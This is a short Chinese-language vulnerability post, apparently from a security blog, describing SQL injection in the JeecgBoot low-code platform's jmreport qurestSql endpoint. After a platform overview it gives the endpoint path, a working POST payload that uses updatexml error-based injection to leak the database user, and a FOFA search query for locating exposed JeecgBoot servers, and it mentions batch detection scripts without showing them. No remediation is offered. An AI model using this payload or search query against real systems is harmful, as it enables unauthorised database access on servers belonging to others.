JEECG-BOOT简介
JeecgBoot是基于BPM的低代码平台,采用前后端分离架构,搭建于SpringBoot 2.x、SpringCloud、Ant Design&Vue、Mybatis-plus、Shiro、JWT等技术栈,支持微服务。其强大的代码生成器实现前后端代码一键生成,助力低代码开发。JeecgBoot引领新低代码开发模式:OnlineCoding->代码生成器->手工MERGE,帮助Java项目解决70%的重复工作,让开发更专注于业务,快速提高效率,节省研发成本,同时保持灵活性。拥有一系列低代码能力,包括Online表单、Online报表、Online图表、表单设计、流程设计、报表设计、大屏设计等。
漏洞描述
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要原因在于web应用程序在接收相关数据参数时未进行有效过滤,直接将其带入数据库查询,使攻击者有可能拼接执行构造的SQL语句。
漏洞复现
URL:
plaintextCopy code
/jeecg-boot/jmreport/qurestSql
POST数据:
jsonCopy code
{"apiSelectId":"1290104038414721025","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
检测脚本
FOFA语句:
plaintextCopy code
title=="JeecgBoot 企业级低代码平台"
单个检测
批量检测
脚本获取方式
暂无评论内容